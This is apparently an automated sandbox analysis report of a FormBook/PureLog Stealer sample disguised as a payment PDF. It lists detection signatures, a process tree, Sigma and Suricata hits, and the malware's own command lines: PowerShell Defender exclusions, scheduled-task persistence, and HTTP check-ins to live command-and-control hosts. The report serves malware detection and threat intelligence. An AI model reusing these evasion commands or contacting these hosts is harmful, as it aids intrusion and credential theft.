Edit tour

Windows Analysis Report
Payment_Confirmation_pdf.exe

Overview

General Information

Sample name:	Payment_Confirmation_pdf.exe
Analysis ID:	1563622
MD5:	dbb00ceac5c3c668bdbb0c91df825be7
SHA1:	e865268ee5de35a4fd0c4754a43a27ad1126bb72
SHA256:	f600cd0546fa26d446a964c8520a7016313990d8d9886ae84778f5b474dc814e
Tags:	exeuser-lowmal3
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Payment_Confirmation_pdf.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe" MD5: DBB00CEAC5C3C668BDBB0C91DF825BE7)

powershell.exe (PID: 7760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8140 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7868 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 8032 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

mYtMtAAMpAtCOL.exe (PID: 6984 cmdline: "C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

sdiagnhost.exe (PID: 7468 cmdline: "C:\Windows\SysWOW64\sdiagnhost.exe" MD5: 76676F0A21E6AF109845151B3CEFE211)

mYtMtAAMpAtCOL.exe (PID: 2340 cmdline: "C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1180 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cQwRvD.exe (PID: 8128 cmdline: C:\Users\user\AppData\Roaming\cQwRvD.exe MD5: DBB00CEAC5C3C668BDBB0C91DF825BE7)

schtasks.exe (PID: 6708 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 6396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 4296 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000013.00000002.2548468685.0000000000840000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1427083355.0000000004129000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000013.00000002.2562055554.0000000000C00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000013.00000002.2562947520.0000000004520000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000014.00000002.2567539017.00000000058F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1653324065.00000000012E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1427083355.0000000004145000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1429337605.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000012.00000002.2564166926.00000000027C0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1655068800.00000000018D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: cQwRvD.exe PID: 8128	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
10.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Payment_Confirmation_pdf.exe.4145828.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Payment_Confirmation_pdf.exe.5bc0000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Payment_Confirmation_pdf.exe.5bc0000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Payment_Confirmation_pdf.exe.4145828.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe, ParentProcessId: 7436, ParentProcessName: Payment_Confirmation_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ProcessId: 7760, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\cQwRvD.exe, ParentImage: C:\Users\user\AppData\Roaming\cQwRvD.exe, ParentProcessId: 8128, ParentProcessName: cQwRvD.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp", ProcessId: 6708, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe, ParentProcessId: 7436, ParentProcessName: Payment_Confirmation_pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", ProcessId: 7868, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe, ParentProcessId: 7436, ParentProcessName: Payment_Confirmation_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ProcessId: 7760, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe, ParentProcessId: 7436, ParentProcessName: Payment_Confirmation_pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", ProcessId: 7868, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T08:55:03.951497+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49810	103.224.182.242	80	TCP
2024-11-27T08:55:29.257259+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49871	118.107.250.103	80	TCP
2024-11-27T08:55:53.964205+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49929	163.44.185.183	80	TCP
2024-11-27T08:56:10.666117+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49970	120.26.240.121	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-27T08:55:21.212102+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49849	118.107.250.103	80	TCP
2024-11-27T08:55:23.883923+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49859	118.107.250.103	80	TCP
2024-11-27T08:55:26.556719+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49865	118.107.250.103	80	TCP
2024-11-27T08:55:45.962255+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49908	163.44.185.183	80	TCP
2024-11-27T08:55:48.537493+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49917	163.44.185.183	80	TCP
2024-11-27T08:55:51.290303+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49923	163.44.185.183	80	TCP
2024-11-27T08:56:02.587195+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49950	120.26.240.121	80	TCP
2024-11-27T08:56:05.260056+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49956	120.26.240.121	80	TCP
2024-11-27T08:56:07.920593+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49962	120.26.240.121	80	TCP
2024-11-27T08:56:17.723762+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49988	209.74.77.108	80	TCP
2024-11-27T08:56:22.397291+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49996	209.74.77.108	80	TCP
2024-11-27T08:56:25.106201+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49997	209.74.77.108	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\cQwRvD.exe

ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: Payment_Confirmation_pdf.exe	Virustotal: Detection: 39%			Perma Link
Source: Payment_Confirmation_pdf.exe	ReversingLabs: Detection: 34%

Yara detected FormBook

Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.2548468685.0000000000840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2562055554.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2562947520.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2567539017.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1653324065.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2564166926.00000000027C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1655068800.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\cQwRvD.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Payment_Confirmation_pdf.exe

Joe Sandbox ML: detected

Source: Payment_Confirmation_pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Payment_Confirmation_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mYtMtAAMpAtCOL.exe, 00000012.00000002.2559391595.0000000000FFE000.00000002.00000001.01000000.0000000E.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2549133517.0000000000FFE000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: RegSvcs.pdb, source: sdiagnhost.exe, 00000013.00000002.2566048825.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000907000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1959082934.000000002734C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1655294935.00000000045D4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1652836303.0000000004424000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.000000000491E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.0000000004780000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1655294935.00000000045D4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1652836303.0000000004424000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.000000000491E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.0000000004780000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: sdiagnhost.pdb source: RegSvcs.exe, 0000000A.00000002.1652980431.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000003.1847590518.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: sdiagnhost.exe, 00000013.00000002.2566048825.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000907000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1959082934.000000002734C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: sdiagnhost.pdbGCTL source: RegSvcs.exe, 0000000A.00000002.1652980431.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000003.1847590518.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\cQwRvD.exe

Code function: 4x nop then jmp 0760782Eh

11_2_07607A8C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49859 -> 118.107.250.103:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49865 -> 118.107.250.103:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49871 -> 118.107.250.103:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49950 -> 120.26.240.121:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49810 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49929 -> 163.44.185.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49849 -> 118.107.250.103:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49917 -> 163.44.185.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49908 -> 163.44.185.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49923 -> 163.44.185.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49962 -> 120.26.240.121:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49970 -> 120.26.240.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49956 -> 120.26.240.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 209.74.77.108:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 209.74.77.108:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49997 -> 209.74.77.108:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.egldfi.xyz
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	DNS query: www.innovateideas.xyz

Source: Joe Sandbox View	IP Address: 209.74.77.108 209.74.77.108
Source: Joe Sandbox View	IP Address: 163.44.185.183 163.44.185.183
Source: Joe Sandbox View	IP Address: 103.224.182.242 103.224.182.242

Source: Joe Sandbox View	ASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View	ASN Name: OCENET-AS-APOCESdnBhdISPMY OCENET-AS-APOCESdnBhdISPMY

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD++abO8It5JcYPCkPcOnqYQu5/zxEcd3IbUYbMxclbWYqlxIiHqv/fheI5hwT1ENg4LFl9g3AAN4+0x46fdQyv+QgeI438A50saYg1ayC/pKrpcm8Y/XPrUV&Zvd8B=gHrX0lXPMBRt-RA HTTP/1.1Host: www.madhf.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Source: global traffic	HTTP traffic detected: GET /yp7g/?d0s=+1DJNz9gq8XLlcrIMdQnpjVtkmq+0J8qQJntyAnHY0zwXJ4Cq6+S40LPv7uqAO8gziztE9nyxlcHp2WlW5MCgSEQjuWrksErLkV7H3W7JIE6+fLHeWIbuzK7jcVo7JJSnKFcAfYIk0fk&Zvd8B=gHrX0lXPMBRt-RA HTTP/1.1Host: www.zxyck.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Source: global traffic	HTTP traffic detected: GET /aayz/?d0s=FykEsP9vX91sr4gIXaga4DgAunY4y8OIW35pWix+cNhS3OVLkBIKdkYv5gM3ZSr/GxN1W6QlvHKhJe8Q7ylOVoBzLShipJdbmb6MlmPWhdxEVrWCkEizo+iavQabSegVUCqoN7tDdJKm&Zvd8B=gHrX0lXPMBRt-RA HTTP/1.1Host: www.sankan-fukushi.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Source: global traffic	HTTP traffic detected: GET /xzte/?Zvd8B=gHrX0lXPMBRt-RA&d0s=ePmhYLVm9S1AwYpTTSZKid9qIij+VYAwULrAeuLQsL02UG94i7HF88rql5COv5lAGhM5DGM0WOZgiTSBkG1OtvSk7+4ip8l/BrXN3KBdu4QudzDN3iYKRjIRKyxXuTAVz68t7cV2ONOD HTTP/1.1Host: www.buckser.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)

